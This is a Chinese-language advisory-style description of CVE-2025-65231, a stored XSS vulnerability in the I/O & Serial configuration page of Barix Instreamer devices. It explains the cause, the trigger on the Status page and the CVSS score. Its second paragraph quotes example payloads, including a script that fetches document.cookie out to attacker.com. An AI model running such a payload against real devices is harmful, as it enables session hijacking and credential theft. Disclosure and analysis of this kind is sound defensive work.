CVE-2025-65231CVE-2025-65231是Barix Instreamer v04.06及更早版本中存在的一个存储型跨站脚本(Stored XSS)漏洞。该漏洞位于Web用户界面的I/O & Serial配置页面,具体问题出在CTS close命令的用户输入字段。攻击者可以在该字段中注入恶意JavaScript脚本代码,由于系统未对用户输入进行充分的输入验证和输出编码,恶意代码被永久存储在系统中。当管理员或其他用户访问设备的状态页面时,被植入的恶意脚本会被浏览器执行,从而导致会话劫持、敏感信息窃取、Cookie盗窃等安全问题。此漏洞的CVSS评分为6.1,属于中等严重程度,攻击复杂度低,无需认证即可实施攻击,但需要用户交互才能触发。攻击者可能利用此漏洞窃取管理员会话令牌,进而获取设备的完全控制权。
该漏洞是一种典型的存储型XSS(Stored Cross-Site Scripting)漏洞。在Barix Instreamer设备的Web管理界面中,I/O & Serial配置页面提供了CTS close命令的输入字段,允许用户自定义配置串口通信参数。系统在接受用户输入后,未对特殊字符进行HTML实体编码或JavaScript转义,直接将输入内容存储到后端数据库。当用户访问Status(状态)页面时,系统从数据库读取之前保存的配置数据并渲染到网页中,恶意脚本随之被执行。攻击者只需构造包含JavaScript代码的Payload,如<script>alert(document.cookie)</script>或<script>fetch('https://attacker.com/steal?c='+document.cookie)</script>,即可在受害者浏览器中执行任意JavaScript代码。由于该输入字段在配置页面中,攻击者无需任何认证即可访问配置接口,降低了攻击门槛。受害者只需查看状态页面即可触发漏洞,无需进行其他操作。